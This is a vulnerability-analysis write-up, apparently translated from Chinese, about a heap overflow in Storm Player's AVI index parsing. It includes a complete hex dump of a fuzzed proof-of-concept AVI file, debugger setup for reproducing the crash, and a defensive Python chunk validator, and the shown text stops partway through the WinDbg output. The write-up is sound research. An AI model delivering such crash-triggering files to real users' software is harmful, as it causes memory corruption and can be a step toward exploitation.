Storm Player (暴风影音) AviIndexChunk Field Heap Overflow: A Hands-On Vulnerability Analysis
While fuzzing Storm Player before the New Year, I obtained an AVI-format POC sample that the MSEC plugin flagged as Exploitable, and only now have I got around to writing up the whole analysis. Although I was ultimately unable to exploit it, I did at least work out the root cause of the vulnerability. Along the way I also picked up some basic approaches to vulnerability analysis, which on reflection I found very satisfying. So I have written it up, hoping to discuss a few of the subtleties of vulnerability analysis with everyone; where I have got things wrong, corrections are welcome.
0x01 Reproducing the Crash
Operating system: Win7 x64
Storm Player version: 5.67.0116.1111
Release date: 17 January 2017
POC sample contents:
00000000h: 52 49 46 46 68 02 00 00 41 56 49 20 4C 49 53 54 ; RIFFh...AVI LIST
00000010h: 2A 02 00 00 68 64 72 6C FE 80 80 80 80 80 AD C1 ; *...hdrl?€€€€?
00000020h: B0 44 6A F8 80 80 81 AB FC 80 80 80 81 94 02 FE ; 癉j鴢€伀鼆€€仈.?
00000030h: 80 80 80 80 81 B9 F8 80 80 81 87 E0 81 87 E0 81 ; €€€€伖鴢€亣鄟囙?
00000040h: 9B E0 81 96 FE 80 80 80 80 81 B2 E0 80 A3 FC 80 ; 涏仏?€€€伈鄝|€
00000050h: 80 80 81 85 FC 80 80 80 81 B5 FE 80 80 80 80 81 ; €€亝鼆€€伒?€€€?
00000060h: 91 E0 80 BA F8 80 80 81 B1 E0 80 A2 F8 80 80 81 ; 戉€壶€€伇鄝Ⅷ€€?
00000070h: 82 F0 80 81 9E FE 80 80 80 80 81 B8 FE 80 80 80 ; 傪€仦?€€€伕?€€
00000080h: 80 81 AF 71 41 F8 80 80 81 BB F0 80 81 80 E0 81 ; €伅qA鴢€伝饊亐鄟
00000090h: 89 FE 80 80 80 80 80 BA 26 E0 80 A7 C0 B2 E0 81 ; 夻€€€€€?鄝Ю侧?
000000a0h: B3 C1 93 FC 80 80 80 81 9C FC 80 80 80 81 84 67 ; 沉擖€€€仠鼆€€亜g
000000b0h: FE 80 80 80 80 81 BC F8 80 80 81 97 E0 81 9D C1 ; ?€€€伡鴢€仐鄟澚
000000c0h: A9 67 FC 80 80 80 80 B3 FE 80 80 80 80 80 BE F0 ; ゞ鼆€€€楚€€€€€攫
000000d0h: 80 80 B2 E0 80 A1 E0 80 A2 C1 8A E0 81 BB F8 80 ; €€侧€∴€⒘娻伝鴢
000000e0h: 80 81 83 FE 80 80 80 80 81 94 E0 81 83 F0 80 81 ; €亙?€€€仈鄟凁€?
000000f0h: 8B E0 80 AA C1 A4 F8 80 80 80 B9 FE 80 80 80 80 ; 嬥€??€€€哈€€€€
00000100h: 81 AF 62 6B E0 80 B0 F8 80 80 80 BD E0 81 B8 C1 ; 伅bk鄝傍€€€洁伕?
00000110h: 82 FC 80 80 80 81 A5 F0 80 81 A9 FE 80 80 80 80 ; 傸€€€仴饊仼?€€€
00000120h: 80 A4 F8 80 80 80 BA FE 80 80 80 80 80 BA F8 80 ; €?€€€湖€€€€€壶€
00000130h: 80 81 9C 22 FE 80 80 80 80 80 B8 C1 8A FE 80 80 ; €仠"?€€€€噶婠€€
00000140h: 80 80 81 B4 F8 80 80 81 8B F8 80 80 80 A8 F0 80 ; €€伌鴢€亱鴢€€?€
00000150h: 81 91 F0 80 81 83 FE 80 80 80 80 81 97 F8 80 80 ; 亼饊亙?€€€仐鴢€
00000160h: 81 AE F0 80 81 85 FE 80 80 80 80 81 BA FE 80 80 ; 伄饊亝?€€€伜?€
00000170h: 80 80 81 90 E0 81 88 F0 80 80 A8 60 C0 B2 79 F0 ; €€亹鄟堭€€╜啦y?
00000180h: 80 81 88 F0 80 81 AF E0 81 B8 C1 A4 F8 80 80 80 ; €亪饊伅鄟噶?€€€
00000190h: BE 47 FE 80 80 80 80 81 8E E0 81 B3 C1 A6 FE 80 ; 綠?€€€亷鄟沉?€
000001a0h: 80 80 80 80 A6 51 38 00 00 00 00 00 00 00 00 00 ; €€€€?8.........
000001b0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001c0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001d0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001e0h: 00 00 4C 49 53 54 4C 00 00 00 73 74 72 6C 73 74 ; ..LISTL...strlst
000001f0h: 72 68 00 00 00 00 61 75 64 73 00 00 00 00 00 00 ; rh....auds......
00000200h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000210h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000220h: 00 00 00 00 00 00 00 00 00 00 D1 1F 00 00 73 74 ; ..........?..st
00000230h: 72 66 00 00 00 00 4A 55 4E 4B 00 00 00 00 4C 49 ; rf....JUNK....LI
00000240h: 53 54 0C 00 00 00 49 4E 46 4F 49 53 42 4A 00 00 ; ST....INFOISBJ..
00000250h: 00 00 4C 49 53 54 0C 00 00 00 6D 6F 76 69 30 30 ; ..LIST....movi00
00000260h: 64 62 00 00 00 00 69 64 78 31 02 00 00 00 00 00 ; db....idx1......
Save the bytes above as poc.avi.
Because this is a heap overflow, the POC sample does not immediately crash StormPlayer.exe in a normal environment. To capture the crash at the point of corruption and obtain a detailed stack backtrace, enable the page heap (hpa) and user-mode stack trace (ust) options beforehand:
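As an added example (not code from the original post or from Storm Player itself), the following Python walks a RIFF/AVI chunk tree and reports the two header inconsistencies a defender would check before a parser trusts the file: a declared chunk size larger than its enclosing container (the fuzzed bytes at offset 0x18 inside the hdrl list declare a size of 0xC1AD8080) and an idx1 chunk whose size is not a multiple of the 16-byte AVIOLDINDEX entry (the two-byte idx1 at the end of the dump). The minimal AVI it builds is constructed for the example; passing poc.avi as a path argument runs the same check over the real sample.

```python
"""
Added example (not code from the original post or from Storm Player): a small
RIFF/AVI chunk walker that flags the kind of inconsistencies seen in the POC
dump, so a fuzzed sample can be triaged before a player touches it.
"""
import struct
import sys

INDEX_ENTRY_SIZE = 16  # one AVIOLDINDEX entry: dwChunkId, dwFlags, dwOffset, dwSize


def _chunk(fourcc, payload):
    """Encode one RIFF chunk. RIFF pads odd-length payloads to an even size."""
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def _list(list_type, payload):
    return _chunk(b"LIST", list_type + payload)


def build_sample(idx1_payload=b"\x00\x00", declared_idx1_size=None):
    """Constructed minimal AVI (an assumption of this example, not poc.avi).

    The default idx1 payload is two bytes, mirroring the trailing
    'idx1 02 00 00 00 00 00' in the POC dump. declared_idx1_size lets the
    chunk header claim a length the file does not actually contain.
    """
    avih = _chunk(b"avih", bytes(56))  # MainAVIHeader is 56 bytes
    strh = _chunk(b"strh", bytes(56))  # AVISTREAMHEADER is 56 bytes
    hdrl = _list(b"hdrl", avih + _list(b"strl", strh))
    movi = _list(b"movi", _chunk(b"00db", bytes(4)))
    idx1 = _chunk(b"idx1", idx1_payload)
    if declared_idx1_size is not None:
        idx1 = b"idx1" + struct.pack("<I", declared_idx1_size) + idx1[8:]
    body = b"AVI " + hdrl + movi + idx1
    return b"RIFF" + struct.pack("<I", len(body)) + body


def walk(data, pos=0, end=None, depth=0, chunks=None, findings=None):
    """Walk the chunks in data[pos:end].

    Returns (chunks, findings): chunks is a list of
    (depth, fourcc, list_type, offset, declared_size); findings is a list of
    human-readable inconsistencies. Every declared size is checked against the
    enclosing container before it is used, which is the check a parser must not skip.
    """
    end = len(data) if end is None else end
    chunks = [] if chunks is None else chunks
    findings = [] if findings is None else findings
    while pos < end:
        if end - pos < 8:
            findings.append(f"0x{pos:x}: {end - pos} trailing byte(s), too short for a chunk header")
            break
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        body = pos + 8
        if size > end - body:
            findings.append(f"0x{pos:x}: {fourcc!r} declares {size} bytes but only {end - body} remain in its container")
            chunks.append((depth, fourcc, None, pos, size))
            break  # the size is untrustworthy, so do not use it to advance
        if fourcc in (b"RIFF", b"LIST"):
            if size < 4:
                findings.append(f"0x{pos:x}: {fourcc!r} is too small to hold a list type")
                break
            list_type = data[body:body + 4]
            chunks.append((depth, fourcc, list_type, pos, size))
            walk(data, body + 4, body + size, depth + 1, chunks, findings)
        else:
            chunks.append((depth, fourcc, None, pos, size))
            if fourcc == b"idx1" and size % INDEX_ENTRY_SIZE:
                findings.append(f"0x{pos:x}: idx1 size {size} is not a multiple of the {INDEX_ENTRY_SIZE}-byte index entry")
        pos = body + size + (size & 1)  # skip the pad byte after odd-sized chunks
    return chunks, findings


def report(data):
    """Print the chunk tree and findings; returns the number of findings."""
    chunks, findings = walk(data)
    for depth, fourcc, list_type, offset, size in chunks:
        label = fourcc.decode("latin-1") + (" " + list_type.decode("latin-1") if list_type else "")
        print(f"{'  ' * depth}{label:<10} @0x{offset:06x} size={size}")
    for finding in findings:
        print("FINDING", finding)
    return len(findings)


if __name__ == "__main__":
    # With a path argument (e.g. poc.avi) the real file is checked; otherwise the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    report(data)
```

The walker deliberately stops at the first chunk whose declared size overruns its container rather than clamping it, because once a length field has been shown to lie, any offset derived from it is a guess; that is the same class of field the title refers to, and the page-heap run below is what shows how the player itself reacts to it.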
> gflags.exe /i StormPlayer.exe +ust +hpa
Current Registry Settings for StormPlayer.exe executable are: 02001000
ust - Create user mode stack trace database
hpa - Enable page heap
After attaching WinDbg to StormPlayer.exe and opening poc.avi, WinDbg catches the following exception:
(484.b28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=23c5d200 ebx=00000000 ecx=00000000 edx=00000002 esi=23c5d26e edi=22297000